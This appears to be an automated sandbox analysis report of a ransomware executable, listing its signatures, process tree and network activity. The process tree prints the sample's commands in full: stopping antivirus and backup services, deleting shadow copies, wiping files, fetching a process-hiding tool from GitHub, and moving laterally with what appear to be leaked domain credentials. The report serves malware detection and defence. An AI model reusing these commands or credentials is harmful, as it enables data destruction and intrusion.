Resubmissions

30-06-2024 11:05

240630-m6ssqawhkc 10

30-06-2024 11:04

240630-m6hmrazejm 10

29-06-2024 20:11

240629-yybd9avdrf 10

Analysis

  • max time kernel
    93s
  • max time network
    133s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240508-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-06-2024 11:04

General

  • Target

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe

  • Size

    87KB

  • MD5

    d6d956267a268c9dcf48445629d2803e

  • SHA1

    cc0feae505dad9c140dd21d1b40b518d8e61b3a4

  • SHA256

    c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850

  • SHA512

    e0791f6eb3116d0590be3af3713c94f787f7ced8e904d4bb8fc0d1341f332053414cb1e9095ae2de041b9e6d6d55cf773bf45ebeb74f27bb95c11a3cc364abee

  • SSDEEP

    1536:OXMLuZQG3KJ3QaIH9shR4fZcvr4C9u3MTIdD9mtthd9JovrgmqhtvM4CoLT6QPbc:gMLuZraJ3a0ehcvv9sM+9mtthd0gmWkr

Malware Config

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Disables service(s) 3 TTPs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Renames multiple (53) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Windows security modification 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Modifies WinLogon 2 TTPs 2 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Interacts with shadow copies 3 TTPs 14 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 8 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
    "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe"
    1⤵
    • Modifies Windows Defender Real-time Protection settings
    • Checks computer location settings
    • Drops startup file
    • Windows security modification
    • Modifies WinLogon
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4192
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "powershell" Get-MpPreference -verbose
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4532
    • C:\Windows\SYSTEM32\net.exe
      "net.exe" stop avpsus /y
      2⤵
        PID:2660
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 stop avpsus /y
          3⤵
            PID:1004
        • C:\Windows\SYSTEM32\net.exe
          "net.exe" stop McAfeeDLPAgentService /y
          2⤵
            PID:2496
            • C:\Windows\system32\net1.exe
              C:\Windows\system32\net1 stop McAfeeDLPAgentService /y
              3⤵
                PID:3684
            • C:\Windows\SYSTEM32\net.exe
              "net.exe" stop mfewc /y
              2⤵
                PID:916
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop mfewc /y
                  3⤵
                    PID:1856
                • C:\Windows\SYSTEM32\net.exe
                  "net.exe" stop BMR Boot Service /y
                  2⤵
                    PID:4576
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop BMR Boot Service /y
                      3⤵
                        PID:2856
                    • C:\Windows\SYSTEM32\net.exe
                      "net.exe" stop NetBackup BMR MTFTP Service /y
                      2⤵
                        PID:2180
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y
                          3⤵
                            PID:3112
                        • C:\Windows\SYSTEM32\net.exe
                          "net.exe" stop DefWatch /y
                          2⤵
                            PID:3308
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 stop DefWatch /y
                              3⤵
                                PID:5420
                            • C:\Windows\SYSTEM32\net.exe
                              "net.exe" stop ccEvtMgr /y
                              2⤵
                                PID:1424
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 stop ccEvtMgr /y
                                  3⤵
                                    PID:5432
                                • C:\Windows\SYSTEM32\net.exe
                                  "net.exe" stop ccSetMgr /y
                                  2⤵
                                    PID:1840
                                    • C:\Windows\system32\net1.exe
                                      C:\Windows\system32\net1 stop ccSetMgr /y
                                      3⤵
                                        PID:5276
                                    • C:\Windows\SYSTEM32\net.exe
                                      "net.exe" stop SavRoam /y
                                      2⤵
                                        PID:4528
                                        • C:\Windows\system32\net1.exe
                                          C:\Windows\system32\net1 stop SavRoam /y
                                          3⤵
                                            PID:5168
                                        • C:\Windows\SYSTEM32\net.exe
                                          "net.exe" stop RTVscan /y
                                          2⤵
                                            PID:4524
                                            • C:\Windows\system32\net1.exe
                                              C:\Windows\system32\net1 stop RTVscan /y
                                              3⤵
                                                PID:5176
                                            • C:\Windows\SYSTEM32\net.exe
                                              "net.exe" stop QBFCService /y
                                              2⤵
                                                PID:224
                                                • C:\Windows\system32\net1.exe
                                                  C:\Windows\system32\net1 stop QBFCService /y
                                                  3⤵
                                                    PID:5316
                                                • C:\Windows\SYSTEM32\net.exe
                                                  "net.exe" stop QBIDPService /y
                                                  2⤵
                                                    PID:232
                                                    • C:\Windows\system32\net1.exe
                                                      C:\Windows\system32\net1 stop QBIDPService /y
                                                      3⤵
                                                        PID:5352
                                                    • C:\Windows\SYSTEM32\net.exe
                                                      "net.exe" stop Intuit.QuickBooks.FCS /y
                                                      2⤵
                                                        PID:4932
                                                        • C:\Windows\system32\net1.exe
                                                          C:\Windows\system32\net1 stop Intuit.QuickBooks.FCS /y
                                                          3⤵
                                                            PID:648
                                                        • C:\Windows\SYSTEM32\net.exe
                                                          "net.exe" stop QBCFMonitorService /y
                                                          2⤵
                                                            PID:4984
                                                            • C:\Windows\system32\net1.exe
                                                              C:\Windows\system32\net1 stop QBCFMonitorService /y
                                                              3⤵
                                                                PID:5328
                                                            • C:\Windows\SYSTEM32\net.exe
                                                              "net.exe" stop YooBackup /y
                                                              2⤵
                                                                PID:3704
                                                                • C:\Windows\system32\net1.exe
                                                                  C:\Windows\system32\net1 stop YooBackup /y
                                                                  3⤵
                                                                    PID:5576
                                                                • C:\Windows\SYSTEM32\net.exe
                                                                  "net.exe" stop YooIT /y
                                                                  2⤵
                                                                    PID:4000
                                                                    • C:\Windows\system32\net1.exe
                                                                      C:\Windows\system32\net1 stop YooIT /y
                                                                      3⤵
                                                                        PID:5732
                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                      "net.exe" stop zhudongfangyu /y
                                                                      2⤵
                                                                        PID:4392
                                                                        • C:\Windows\system32\net1.exe
                                                                          C:\Windows\system32\net1 stop zhudongfangyu /y
                                                                          3⤵
                                                                            PID:5528
                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                          "net.exe" stop stc_raw_agent /y
                                                                          2⤵
                                                                            PID:3360
                                                                            • C:\Windows\system32\net1.exe
                                                                              C:\Windows\system32\net1 stop stc_raw_agent /y
                                                                              3⤵
                                                                                PID:5412
                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                              "net.exe" stop VSNAPVSS /y
                                                                              2⤵
                                                                                PID:3824
                                                                                • C:\Windows\system32\net1.exe
                                                                                  C:\Windows\system32\net1 stop VSNAPVSS /y
                                                                                  3⤵
                                                                                    PID:5564
                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                  "net.exe" stop VeeamTransportSvc /y
                                                                                  2⤵
                                                                                    PID:2500
                                                                                    • C:\Windows\system32\net1.exe
                                                                                      C:\Windows\system32\net1 stop VeeamTransportSvc /y
                                                                                      3⤵
                                                                                        PID:5612
                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                      "net.exe" stop VeeamDeploymentService /y
                                                                                      2⤵
                                                                                        PID:2552
                                                                                        • C:\Windows\system32\net1.exe
                                                                                          C:\Windows\system32\net1 stop VeeamDeploymentService /y
                                                                                          3⤵
                                                                                            PID:5336
                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                          "net.exe" stop VeeamNFSSvc /y
                                                                                          2⤵
                                                                                            PID:388
                                                                                            • C:\Windows\system32\net1.exe
                                                                                              C:\Windows\system32\net1 stop VeeamNFSSvc /y
                                                                                              3⤵
                                                                                                PID:5160
                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                              "net.exe" stop veeam /y
                                                                                              2⤵
                                                                                                PID:4228
                                                                                                • C:\Windows\system32\net1.exe
                                                                                                  C:\Windows\system32\net1 stop veeam /y
                                                                                                  3⤵
                                                                                                    PID:5544
                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                  "net.exe" stop PDVFSService /y
                                                                                                  2⤵
                                                                                                    PID:4384
                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                      C:\Windows\system32\net1 stop PDVFSService /y
                                                                                                      3⤵
                                                                                                        PID:5688
                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                      "net.exe" stop BackupExecVSSProvider /y
                                                                                                      2⤵
                                                                                                        PID:1720
                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                          C:\Windows\system32\net1 stop BackupExecVSSProvider /y
                                                                                                          3⤵
                                                                                                            PID:5496
                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                          "net.exe" stop BackupExecAgentAccelerator /y
                                                                                                          2⤵
                                                                                                            PID:2096
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
                                                                                                              3⤵
                                                                                                                PID:5668
                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                              "net.exe" stop BackupExecAgentBrowser /y
                                                                                                              2⤵
                                                                                                                PID:2704
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
                                                                                                                  3⤵
                                                                                                                    PID:5556
                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                  "net.exe" stop BackupExecDiveciMediaService /y
                                                                                                                  2⤵
                                                                                                                    PID:1776
                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                      C:\Windows\system32\net1 stop BackupExecDiveciMediaService /y
                                                                                                                      3⤵
                                                                                                                        PID:5640
                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                      "net.exe" stop BackupExecJobEngine /y
                                                                                                                      2⤵
                                                                                                                        PID:2192
                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                          C:\Windows\system32\net1 stop BackupExecJobEngine /y
                                                                                                                          3⤵
                                                                                                                            PID:5676
                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                          "net.exe" stop BackupExecManagementService /y
                                                                                                                          2⤵
                                                                                                                            PID:5096
                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                              C:\Windows\system32\net1 stop BackupExecManagementService /y
                                                                                                                              3⤵
                                                                                                                                PID:5752
                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                              "net.exe" stop BackupExecRPCService /y
                                                                                                                              2⤵
                                                                                                                                PID:4616
                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                  C:\Windows\system32\net1 stop BackupExecRPCService /y
                                                                                                                                  3⤵
                                                                                                                                    PID:5648
                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                  "net.exe" stop AcrSch2Svc /y
                                                                                                                                  2⤵
                                                                                                                                    PID:3408
                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                      C:\Windows\system32\net1 stop AcrSch2Svc /y
                                                                                                                                      3⤵
                                                                                                                                        PID:5624
                                                                                                                                    • C:\Windows\SYSTEM32\net.exe
                                                                                                                                      "net.exe" stop AcronisAgent /y
                                                                                                                                      2⤵
                                                                                                                                        PID:924
                                                                                                                                        • C:\Windows\system32\net1.exe
                                                                                                                                          C:\Windows\system32\net1 stop AcronisAgent /y
                                                                                                                                          3⤵
                                                                                                                                            PID:5708
                                                                                                                                        • C:\Windows\SYSTEM32\net.exe
                                                                                                                                          "net.exe" stop CASAD2DWebSvc /y
                                                                                                                                          2⤵
                                                                                                                                            PID:1032
                                                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                                                              C:\Windows\system32\net1 stop CASAD2DWebSvc /y
                                                                                                                                              3⤵
                                                                                                                                                PID:5656
                                                                                                                                            • C:\Windows\SYSTEM32\net.exe
                                                                                                                                              "net.exe" stop CAARCUpdateSvc /y
                                                                                                                                              2⤵
                                                                                                                                                PID:744
                                                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                                                  C:\Windows\system32\net1 stop CAARCUpdateSvc /y
                                                                                                                                                  3⤵
                                                                                                                                                    PID:5380
                                                                                                                                                • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                  "net.exe" stop sophos /y
                                                                                                                                                  2⤵
                                                                                                                                                    PID:1748
                                                                                                                                                    • C:\Windows\system32\net1.exe
                                                                                                                                                      C:\Windows\system32\net1 stop sophos /y
                                                                                                                                                      3⤵
                                                                                                                                                        PID:5632
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1100
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:1156
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SQLWriter start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4688
                                                                                                                                                    • C:\Windows\SYSTEM32\sc.exe
                                                                                                                                                      "sc.exe" config SstpSvc start= disabled
                                                                                                                                                      2⤵
                                                                                                                                                      • Launches sc.exe
                                                                                                                                                      PID:4176
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mspub.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2468
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopqos.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:1716
                                                                                                                                                    • C:\Windows\SYSTEM32\taskkill.exe
                                                                                                                                                      "taskkill.exe" /IM mydesktopservice.exe /F
                                                                                                                                                      2⤵
                                                                                                                                                      • Kills process with taskkill
                                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                      PID:2508
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3240
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4416
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=c: /on=c: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4544
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:872
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=d: /on=d: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4896
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3744
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=e: /on=e: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2556
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:3640
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=f: /on=f: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:2092
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4412
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=g: /on=g: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:972
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=401MB
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1904
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" resize shadowstorage /for=h: /on=h: /maxsize=unbounded
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:1484
                                                                                                                                                    • C:\Windows\SYSTEM32\vssadmin.exe
                                                                                                                                                      "vssadmin.exe" Delete Shadows /all /quiet
                                                                                                                                                      2⤵
                                                                                                                                                      • Interacts with shadow copies
                                                                                                                                                      PID:4044
                                                                                                                                                    • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                      "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
                                                                                                                                                      2⤵
                                                                                                                                                        PID:2340
                                                                                                                                                      • C:\Windows\SYSTEM32\net.exe
                                                                                                                                                        "net.exe" use \\10.127.1.17 /USER:SHJPOLICE\amer !Omar2012
                                                                                                                                                        2⤵
                                                                                                                                                          PID:2228
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\jv2uowbm.exe" \10.127.1.17 -u SHJPOLICE\amer -p !Omar2012 -d -f -h -s -n 2 -c C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                          2⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                          PID:5696
                                                                                                                                                          • C:\Windows\System32\Conhost.exe
                                                                                                                                                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                            3⤵
                                                                                                                                                              PID:5176
                                                                                                                                                          • C:\Windows\SYSTEM32\arp.exe
                                                                                                                                                            "arp" -a
                                                                                                                                                            2⤵
                                                                                                                                                              PID:2956
                                                                                                                                                            • C:\Windows\System32\mshta.exe
                                                                                                                                                              "C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta
                                                                                                                                                              2⤵
                                                                                                                                                              • Blocklisted process makes network request
                                                                                                                                                              PID:5892
                                                                                                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                                                                                                              "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                                                                                                                                                              2⤵
                                                                                                                                                                PID:5280
                                                                                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5276
                                                                                                                                                                  • C:\Windows\system32\PING.EXE
                                                                                                                                                                    ping 127.0.0.7 -n 3
                                                                                                                                                                    3⤵
                                                                                                                                                                    • Runs ping.exe
                                                                                                                                                                    PID:5568
                                                                                                                                                                  • C:\Windows\system32\fsutil.exe
                                                                                                                                                                    fsutil file setZeroData offset=0 length=524288 “%s”
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:5148
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                    2⤵
                                                                                                                                                                      PID:5664
                                                                                                                                                                      • C:\Windows\system32\choice.exe
                                                                                                                                                                        choice /C Y /N /D Y /T 3
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:5040
                                                                                                                                                                    • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                      C:\Windows\System32\WaaSMedicAgent.exe 692cdefe6a31d5f30fa313ea55acb130 0dFin8KRqEqhT0NjofFp3Q.0.1.0.0.0
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:4896
                                                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:224

                                                                                                                                                                        Network

                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          185.199.109.133
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          185.199.108.133
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          185.199.111.133
                                                                                                                                                                          raw.githubusercontent.com
                                                                                                                                                                          IN A
                                                                                                                                                                          185.199.110.133
                                                                                                                                                                        • flag-us
                                                                                                                                                                          GET
                                                                                                                                                                          https://raw.githubusercontent.com/d35ha/ProcessHide/master/bins/ProcessHide64.exe
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          185.199.109.133:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET /d35ha/ProcessHide/master/bins/ProcessHide64.exe HTTP/1.1
                                                                                                                                                                          Host: raw.githubusercontent.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                          Content-Length: 141478
                                                                                                                                                                          Cache-Control: max-age=300
                                                                                                                                                                          Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                                          Content-Type: application/octet-stream
                                                                                                                                                                          ETag: "3bc3d78bc68a5b7b2573b11d0715f13a64eb42781d6a05c2f3015bf90df87dbc"
                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                          X-Frame-Options: deny
                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                          X-GitHub-Request-Id: DDF0:34BFB4:F6A28:1448E7:66813BCA
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:43 GMT
                                                                                                                                                                          Via: 1.1 varnish
                                                                                                                                                                          X-Served-By: cache-lcy-eglc8600046-LCY
                                                                                                                                                                          X-Cache: MISS
                                                                                                                                                                          X-Cache-Hits: 0
                                                                                                                                                                          X-Timer: S1719745483.932825,VS0,VE136
                                                                                                                                                                          Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                          X-Fastly-Request-ID: 4d46a33b5975fea5a26d36657f859f2ad4dade3c
                                                                                                                                                                          Expires: Sun, 30 Jun 2024 11:09:43 GMT
                                                                                                                                                                          Source-Age: 0
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          Response
                                                                                                                                                                          133.109.199.185.in-addr.arpa
                                                                                                                                                                          IN PTR
                                                                                                                                                                          cdn-185-199-109-133githubcom
                                                                                                                                                                        • flag-us
                                                                                                                                                                          DNS
                                                                                                                                                                          www.google.com
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          8.8.8.8:53
                                                                                                                                                                          Request
                                                                                                                                                                          www.google.com
                                                                                                                                                                          IN A
                                                                                                                                                                          Response
                                                                                                                                                                          www.google.com
                                                                                                                                                                          IN A
                                                                                                                                                                          142.250.187.196
                                                                                                                                                                        • flag-gb
                                                                                                                                                                          GET
                                                                                                                                                                          https://www.google.com/
                                                                                                                                                                          c460fc0d4fdaf5c68623e18de106f1c3601d7bd6ba80ddad86c10fd6ea123850.exe
                                                                                                                                                                          Remote address:
                                                                                                                                                                          142.250.187.196:443
                                                                                                                                                                          Request
                                                                                                                                                                          GET / HTTP/1.1
                                                                                                                                                                          Host: www.google.com
                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                          Response
                                                                                                                                                                          HTTP/1.1 200 OK
                                                                                                                                                                          Date: Sun, 30 Jun 2024 11:04:43 GMT
                                                                                                                                                                          Expires: -1
                                                                                                                                                                          Cache-Control: private, max-age=0
                                                                                                                                                                          Content-Type: text/html; charset=ISO-8859-1
                                                                                                                                                                          Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-OV835FREtRAyNmFk_sWfuQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
                                                                                                                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                          Server: gws
                                                                                                                                                                          X-XSS-Protection: 0
                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                          Set-Cookie: AEC=AQTF6HyGEfBGfLwHC3Z_-OKhAI-lxj6MxgjRj9Eh3zjXmnIpg0wPww_tKlE; expires=Fri, 27-Dec-2024 11:04:43 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                          Set-Cookie: __Secure-ENID=20.SE=EfexZMPWr43Lx24QA04vdlTjjt-D_rPOkeJPFmtOZqHxnsvQchT4WqE_WlNz1eIsbNvl8fAiI0rgdwIpARG61bu6JJixIJo3lLyTbRCyA6OsIKqSYf5scx5JV5nzANUhcnSDR_y0Cdo7al3QAJx0aF4xo-moRiQeKFj6Fs1ozlxyLg8hDJYl; expires=Thu, 31-Jul-2025 03:23:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
                                                                                                                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                          Accept-Ranges: none
                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                        • flag-us
